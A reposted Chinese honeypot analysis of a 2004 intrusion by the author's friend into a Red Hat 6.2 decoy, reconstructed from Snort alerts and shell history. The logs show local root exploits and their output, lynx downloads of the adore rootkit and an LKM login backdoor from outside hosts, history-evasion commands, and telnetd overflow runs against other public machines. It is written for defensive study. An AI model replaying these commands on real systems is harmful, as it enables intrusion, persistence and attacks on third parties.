一次入侵秀的详细分析
[转载]一次入侵秀的详细分析
信息来源:https://www.sodocs.net/doc/031230822.html,
Sinbad Technical Publications Page 1
1.起因
本文聚焦于我的Linux Honeypot,她在网络中散发着阵阵蜜香,引诱蠕虫和各
路客们的光临。为了让honeypot 更加attractive,都要采取一些处理方式。最
近邮件列表中还有过这种讨论,有个家伙说他朋友在某黑客IRC 中公布了
honeypot 的IP 地址,结果一帮罗马利亚黑客入侵后发现是一个蜜罐系统,所
有动作都被完整记录,于是愤怒了,采用分布式拒绝服务方式疯狂报复,导致
临近网络瘫痪一个月之久。
所以,在引诱入侵者的时候要讲究技巧。上个月我曾和一个朋友聊起我的方法:
建立一个普通用户账号,密码同用户名,在控制台上用该账号登录,让他一直
发呆,同时确认系统开放着finger 服务。比较怀旧的入侵者对finger还是情有
独钟的,企图finger出一大堆用户名,然后简单猜测密码进入系统,期望能够
与后生可畏的Script Kids 们划清界限。
没想到我的朋友记忆力特别好,事隔一个月,在我没发请柬的情况下,轻车熟
路的找到honeypot,然后用那个普通账号登录了进去。
明明知道这是个蜜罐系统,所有行为都被监控和记录,还要企图本地拿root、
安装后门、作为肉鸡攻击其他机器,不就是在舞台上表演请观众们欣赏么?这
就是入侵秀一词的由来。
下面就让我们一起来观摩这场表演,素材主要来源于日志服务器收集到的系统
日志、历史命令,以及Snort 录下的会话过程。当然,为了节约篇幅和保护隐
私作了部分裁减。希望读者从各自的角度都能有所收获。
2.扫描
一个周六的下午,Snort 报警提示有来自202.X.X.X 的SuperScan 扫描,发送
了一个ICMP Echo 的数据包测试系统是否存活:
2004-9-21 16:48 snort[1852]: [1:474:1] ICMP superscan echo [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 202.X.X.X -> 10.0.0.1
同时,系统日志记录了后续进行的端口探测活动:
Sinbad Technical Publications Page 2
2004-9-21 16:48 in.rlogind[1316]: connect from 210.X.X.X
2004-9-21 16:48 inetd[413]: pid 1318: exit status 1
2004-9-21 16:48 in.rshd[1318]: connect from 210.X.X.X
2004-9-21 16:48 in.fingerd[1315]: connect from 210.X.X.X
2004-9-21 16:48 in.telnetd[1313]: connect from 210.X.X.X
2004-9-21 16:48 rshd[1318]: Connection from 210.X.X.X on illegal port
2004-9-21 16:48 telnetd[1313]: ttloop: peer died: EOF
2004-9-21 16:48 inetd[413]: pid 1316: exit status 1
2004-9-21 16:48 inetd[413]: pid 1313: exit status 1
2004-9-21 16:48 sendmail[1314]: NOQUEUE: Null connection from [210.X.X.X]
2004-9-21 16:48 in.fingerd[1319]: connect from 210.X.X.X
2004-9-21 16:48 in.telnetd[1320]: connect from 210.X.X.X
注意到没有,这些端口连
接的源地址不是发送ICMP Echo 的202.X.X.X,而是
210.X.X.X这个地址。很显然,我的朋友使用了TCP/UDP协议的代理跳板,而
ICMP 协议不被该跳板支持,所以他的真实IP 地址也暴露了。:P
3.本地越权尝试
用我的诱饵账号tom轻松登入,一次成功,就像进自己家一样:
2004-9-21 16:52 login: LOGIN ON 1 BY tom FROM 210.X.X.X
2004-9-21 16:52 PAM_pwdb[1321]: (login) session opened for user tom by(uid=0)
用cat 重定向加粘贴方式传送一段本地越权脚本到系统内,请注意时间差,他
的翻箱倒柜花了4 分钟:
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 pwd
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 cd ..
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cd tom
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cat > 1.sh
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 chmod 755 1.sh
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 ./1.sh
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 ls
Sinbad Technical Publications Page 3
输入./1.sh 执行后的结果呢?我们通过检查Snort 的SESSION录像后发现,系
统由于缺少相关库文件,没成功。注意:录像中命令输入的每个字符都出现了
两遍,这是终端的回显功能,Snort是忠实的作了双向记录:
[tom@abc tom]$ ..//11..sshh
+-----------------------------------------------------------+
| Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1 |
| local root exploit |
| |
| Bugs found and exploit wr#tten by Wojciech Purczynski |
| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet |
+-----------------------------------------------------------+
Creating temporary directory
Creating anti-noexec library (capdrop.c)
Compiling anti-noexec library (capdrop.so)
Creating suid shell (sush.c)
Compiling suid shell (sush.c)
Creating shell script
Creating own sm.cf
Dropping CAP_SETUID and calling sendmail
/bin/true: error in loading shared libraries: /tmp/foo/capdrop.so: cannot open shared object file:
No such file or directory
Waiting for suid shell (/tmp/sush)
[tom@abc tom]$ llss
第一次尝试失败,删除1.sh,同时留下“XXXX到此一游”的签名。也好,知
道是你干的了J
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 rm -rf 1.sh
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 echo haha shi wo XXXX > haha.txt
我的朋友开始闲逛了,好像没什么收获:
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd /tmp
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd foo
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
Sinbad Technical Publications Page 4
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd ..
2004-9-21 16:59 -bash: HISTORY: PID=132
2 UID=500 ls -al
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd .font-unix
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd home
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd ftp
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:01 -bash: HISTORY: PID=1322 UID=500 ps -ef
4.第二次本地越权尝试
重新换了个本地越权程序,编译后又立即把它删除了?
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cd ~tom
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c
原来是编译的时候出错了。源代码中有些字符在用cat 重定向粘贴的时候出了
问题:
[tom@abc tom]$ ggcccc - -oo ssuu https://www.sodocs.net/doc/031230822.html,
su.c:101: unterminated character constant
Sinbad Technical Publications Page 5
换种方式,vi 一个新文件,往里面贴:
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 vi su.c
2004-9-21 17:07 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
这次的效果更加不好,出现了三个错误。同时我们也注意到,记录下来的的输
入命令部分有大量的 [A、[D 字符,这其实是在用上下键寻找刚才敲过的历史
命令“gcc –o su su.c”,看来他是够懒的:P
[tom@abc tom]$ [Avi su.c[A[D[D[D[D[D[D[D[4@rm -rf su.c[A[D[D[D[D[D[D[D[D[D[D[Dls[K[A[D[Dgcc -o su su.c
su.c:107: unterminated character constant
su.c:523: unterminated string or character constant
su.c:130: possible real start of unterminated constant
又留下一句话“以后有空再搞”,走了。周末下午的5 点多,应该有活动吧:
2004-9-21 17:09 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 rm -rf *.c
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 echo kao,yihou you kong zai gao >> haha.txt
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 cat .bash_history
2004-9-21 17:13 -bash: HISTORY: PID=1322 UID=500 cat /etc/passwd
2004-9-21 17:16 -bash: HISTORY: PID=1322 UID=500 exit
5.第三次本地越权尝试
两天后,我的朋友又来了。是一个周一的下午,上班
时间,看来他的工作不是
很忙。这就是“搞机器”一族的共同特点:拥有大量的时间和精力。
2004-9-23 13:28 in.telnetd[5567]: connect from 210.X.X.X
2004-9-23 13:28 PAM_pwdb[5568]: (login) session opened for user tom by(uid=0)
2004-9-23 13:28 login: LOGIN ON 1 BY tom FROM 210.X.X.X
Sinbad Technical Publications Page 6
这次他吸取了教训,试图用wget 直接从网上下载,不过我的系统好像没有装
wget,或者PATH 值不对,最后他改用lynx 加-dump 参数成功的从国内一个
hack.co.za 的镜像站点下载了利用/bin/su 的越权程序su.c,编译后执行,终于
获得了本地root权限:
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 w
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 ps -ef
2004-9-23 13:32 -bash:HISTORY: PID=5569 UID=500 wget _hack_co_za/redhat/5.1/su.c">https://www.sodocs.net/doc/031230822.html,/www_hack_co_za/redhat/5.1/su.c
2004-9-23 13:34 -bash: HISTORY: PID=5569 UID=500 lynx
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 lynx -dump _hack_co_za/redhat/5.1/su.c">https://www.sodocs.net/doc/031230822.html,/www_hack_co_za/redhat/5.1/su.c > su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 ./su
su exploit by XP
Enjoy!
Phase 1. Checking paths and write permisions
Checking for /usr/bin/msgfmt...Ok
Checking for /usr/bin/objdump...Ok
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking for a valid language... [using af_ZA] Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Phase 2. Calculating eat and pad values
......................................................................done
eat = 120 and pad = 2
Phase 3. Creating evil libc.mo and setting enviroment
vars
Phase 4. Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804bd3c
Phase 5. Compiling suid shell
/tmp/xp created Ok
Phase 6. Executing /bin/su
- Entering rootshell ;-) -
sh-2.03# iid
Snort也报警提示他获得了root权限:
2004-9-23 13:37 snort[1852]: [1:498:3] ATTACK RESPONSES id check returned root [Classification:
Potentially Bad Traffic] [Priority: 2]: {TCP} 10.0.0.1:23 -> 210.x.x.x:4560
Sinbad Technical Publications Page 7
6.安装后门
成功取得最高权限后,我的朋友开始下载adore rootkit和一个叫做sunxkdoor
的后门程序:
2004-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx -dump https://www.sodocs.net/doc/031230822.html,/rootkits/adore-0.52.tgz > 1.tgz
2004-9-23 13:47 sh: HISTORY: PID=7046 UID=0 lynx -dump https://www.sodocs.net/doc/031230822.html,/mysoft/sunxkdoor.tar > 1.tar
不过这次又失败了,重定向的文件都是0 字节。因为在越权获得的这个shell
中,lynx并不能正常的工作:
sh-2.03# lynx -dump https://www.sodocs.net/doc/031230822.html,/rootkits/adore-0.52.tgz >> 1.tgz
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# llyynnxx --dduummpp http:h//https://www.sodocs.net/doc/031230822.html,/mysoft/sunxkdoor.tarttp://https://www.sodocs.net/doc/031230822.html,/mysoft/sunxkdoor.tar >> 11..ttarar
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# lls s-a l
-al
total 4
drwxr-xr-x 2 tom tom 1024 Sep 22 21:43 .
drwxrwxrwt 5 root root 1024 Sep 22 21:35 ..
-rw-rw-r-- 1 root root 0 Sep 22 21:43 1.tar
-rw-rw-r-- 1 root root 0 Sep 22 21:37 1.tgz
-rw-rw-r-- 1 root root 0 Sep 22 21:37 adore.tgz
-rwxrwxrwx 1 tom tom 458 Sep 22 21:35 libc.mo
-rw-rw-r-- 1 tom tom 428 Sep 22 21:35 libc.po
sh-2.03# rrm m --rrff **
多次失败之后,他退出了rootshell 返回到正常的终端下,成功的用lynx 分别
下载了一个攻击telnet 守护进程的telnetd.c 保存为1.c、adore rootkit 保存为
1.tgz、sunxkdoor 后门保存为2.tar:
sh-2.03# eexxiitt
exit
Sinbad Technical Publications Page 8
Phase 7. Cleaning enviroment
rm: cannot unlink `/tmp/xp': Operation not permitted
2004-9-23 14:03 -bash: HISTORY: PID=5569 UID=500 lynx -dump https://www.sodocs.net/doc/031230822.html,/pliki/exploits/telnetd/telnetd.c">https://www.sodocs.net/doc/031230822.html,/pliki/exploits/telnetd/telnetd.c> 1.c
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 lynx -dump https://www.sodocs.net/doc/031230822.html,/rootkits/adore-0.52.tgz> 1.tgz
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 tar zxfv 1.tgz
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 cd adore
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ./configure
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 make
2004-9-23 14:06 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:07 -bash: HISTORY: PID=5569 UID=500 cd ..
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 lynx -dump https://www.sodocs.net/doc/031230822.html,/mysoft/sunxkdoor.tar > 2.tar
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export HISTFILE=/dev/null
下面开始安装sunxkdoor 这个LKM 的后门,这需要root权限,他再次运行su
的越权程序获得rootshell,然后用insmod加载sunxkdoor,便退出了系统利用
这个后门绕开登录过程进来了。
此后门应该是截获了原有/bin/login 的调用,先是telnet 到系统,在login:提示
符后输入sunxkdoor 这个关键串,系统自动断开连接;接着再telnet,就直接
获得root的#号提示符。
注意,他把下载的三个后门程序都移到tom主目录下新建的TOM目录中了。
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ./su
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 pwd
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 cd ~tom
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 tar xfv 2.tar
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export HISTFILE=/dev/null
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 cd sunxkdoor
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 ls
2004-9
-23 14:13 sh: HISTORY: PID=8570 UID=0 gcc -O2 -c sunxknlsh_linux_II.c
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 mv sunxknlsh_linux_II.o ../sun.o
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 cd ..
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 w
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 rm -rf sunxkdoor
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
Sinbad Technical Publications Page 9
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mkdir TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mv * TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 cd TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 insmod
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 whereis insmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/lsmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit
2004-9-23 14:17 -bash: HISTORY: PID=5569 UID=500 exit
2004-9-23 14:17 PAM_pwdb[5568]: (login) session closed for user tom
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: ssuunnxkxkddooroor
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
[root@abc /]# ccd d ~~ttomom
[root@abc tom]# llss
TOM
下面开始安装adore,编译的时候缺少一个头文件,我的朋友还是能够从Linux
源代码的目录中找到并拷贝到adore目录中,把adore 编译出来了。启动adore
后,利用工具ava隐藏TOM 目录时,尽管提示hidden,但ls的时候还是能看
到。我的朋友很郁闷,可能是adore 和sunxkdoor这两个LKM 之间有冲突。
2004-9-23 14:23 login: HISTORY: PID=8620 UID=0 cd TOM
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 tar zxfv 1.tgz
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 cd adore
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 ls
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 ./configure
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 make
2004-9-23 14:23 login: HISTORY: PID=8620 UID=0 find / -name spinlock.h
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 cp /usr/src/linux-2.2.14/include/asm-i386/spinlock.h .
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 make
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv *.o ../
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 ls
Sinbad Technical Publications Page 10
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv ava ../
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 mv startadore ../
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 cd ..
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 rm -rf adore
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 vi startadore
2004-9-23 14:29 l
ogin: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 insmod
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 ./startadore
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 mv startadore start
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h ..TOM
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h ../TOM
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 cd ..
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ls
7.作为跳板攻击他人
用adore 没有成功的隐藏目录,我的朋友突然想起来自己曾经下载过一个
telnetd 的远程溢出脚本,于是编译保存为1,就开始了试验,先是攻击本机,
后来又改攻公网上的其他机器。理论上讲,honeypot应该限制往外发起的连接,
比如同一时间内的连接数,以防止被人安装了分布式拒绝服务程序,用来攻击
其他机器,引起不必要的麻烦。我的honeypot并没有做这方面的限制,因为我
每天都花时间来观看她里面发生的故事,做到了如指掌J
2004-9-23 14:50 login: HISTORY: PID=8699 UID=0 ./1 -h 127.0.0.1
2004-9-23 14:50 in.telnetd[8774]: connect from 127.0.0.1
2004-9-23 14:50 telnetd[8774]: ttloop: peer died: EOF
2004-9-23 14:56 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230 -t 5
2004-9-23 14:58 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230
2004-9-23 14:59 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 14:59 inetd[8783]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:10 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 15:10 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.96 -t 5
2004-9-23 15:10 inetd[8793]: 2222/tcp: bind: Address already in use
2004-9-23 15:10 inetd[8793]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:11 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.106 -t 5
2004-9-23 15:11 inetd[8793]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:12 inetd[8796]: extra conf for service 2222/tcp (skipped)
Sinbad Technical Publications Page 11
2004-9-23 15:12 inetd[8796]: 2222/tcp: bind: Address already in use
2004-9-23 15:14 last message repeated 2 times
2004-9-23 15:14 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.186 -t 3
2004-9-23 15:15 inetd[8799]: 2222/tcp: bind: Address already in use
2004-9-23 15:15 inetd[8799]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:15 snort[1852]: [1:648:5] SHELLCODE x86 NOOP [Classification: Executable
code was detected] [Priority: 1]: {TCP} 211.xxx.xxx.186:23 -> 10.0.0.1:1053
2004-9-23 15:17 last message repeated 3 times
2004-9-23 15:17 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.25 -t 4
2004-9-23 15:17 inetd[8804]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:17 inetd[8804]: 2222/tcp: bind: Address already in use
2004-9-23 15:18 last message repeated 4 times
2004-9-23 15:18 login: HISTORY: P
ID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2004-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2004-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.15 -t 5
2004-9-23 15:20 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.226 -t 4
在这里我没有太多关注这个溢出脚本的执行结果,只是注意到系统产生了大量
的同一条日志,都发生在./1 命令执行之后:
2004-9-23 15:20 inetd[8810]: 2222/tcp: bind: Address already in use
经过检查,原来是在tcp/2222 端口打开了一个root 权限的shell!看来这个溢
出程序的功能蛮多的,还给自己的机器绑定shell:P
接着,我登录MSN 联系到那位朋友,他说打算结束表演了,于是我开始kill
掉这该死的telnetd 溢出程序,修复伤痕累累的honeypot 让她重新上线。同时
备份入侵日志文件,抓住他的把柄以备将来敲诈。:)
8.总结
本文介绍了引诱入侵者的一种方法,以及对一个朋友的不请自到所作操作的详
细分析。包括借助跳板隐藏真实IP、三次尝试本地越权最后成功、安装了两个
LKM 类的后门、以及作为跳板攻击他人机器。这是一个典型的入侵工作者的
作业流程,我们通过分析这些行为的细节,可以学习认识到更多的后门程序、
溢出脚本、故障排除方法,甚至个人习惯等一些有趣的东西。